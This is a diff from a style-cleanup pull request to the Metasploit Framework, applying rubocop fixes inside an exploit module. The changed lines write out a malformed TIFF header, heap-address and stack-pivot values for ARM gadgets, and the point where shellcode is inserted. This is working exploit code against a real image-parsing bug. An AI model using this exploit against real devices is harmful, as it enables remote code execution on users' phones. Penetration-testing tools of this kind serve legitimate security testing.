@@ -96,35 +97,34 @@ class MetasploitModule < Msf::Exploit::Remote
     #
 
     lolz = 2048
-    tiff =
-      "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
-      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
-      "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
-      "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
-      "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
-      "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
-      "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
-      "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
-      "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
-      "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
-      [lolz].pack("V") +
-      "\x84\x00\x00\x00\x00\x00\x00\x00"
+    tiff = "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"
+    tiff << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    tiff << "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"
+    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"
+    tiff << "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"
+    tiff << [lolz].pack('V')
+    tiff << "\x84\x00\x00\x00\x00\x00\x00\x00"
 
     # Randomize the bajeezus out of our data
     hehe = rand_text(lolz)
 
     # Were going to candy mountain!
-    hehe[120, 4] = [targ['Magic']].pack("V")
+    hehe[120, 4] = [targ['Magic']].pack('V')
 
     # >> add r0, r4, #0x30
-    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
+    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack('V')
 
     # Candy mountain, Charlie!
     # >> mov r1, sp
 
     # It will be an adventure!
     # >> mov r2, r8
-    hehe[ 92, 4] = [ hehe.length ].pack("V")
+    hehe[92, 4] = [ hehe.length ].pack('V')
 
     # Its a magic leoplurodon!
     # It has spoken!
@@ -149,7 +149,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # We made it to candy mountain!
     # Go inside Charlie!
     # sub sp, r7, #0x14
-    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
+    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack('V')
 
     # Goodbye Charlie!
     # ;; targ['Heap'] + 0x48 becomes the stack pointer
@@ -159,7 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # >> ldmia sp!, {r4, r5, r6, r7, pc}
 
     # Return back to the copied heap data
-    hehe[192, 4] = [  targ['Heap'] + 196  ].pack("V")
+    hehe[192, 4] = [ targ['Heap'] + 196 ].pack('V')
 
     # Insert our actual shellcode at heap location + 196
     hehe[196, payload.encoded.length] = payload.encoded


### PR DESCRIPTION
All violations were resolved with `rubocop -a`, except missing notes.

The `modules/exploits/apple_ios/browser/webkit_createthis.rb` module has an exceptionally long method containing 700+ lines of JavaScript which triggers a `Metrics/MethodLength` violation. This should be abstracted away into files in the `data` directory. As a temporary measure, `Metrics/MethodLength` is temporarily disabled.
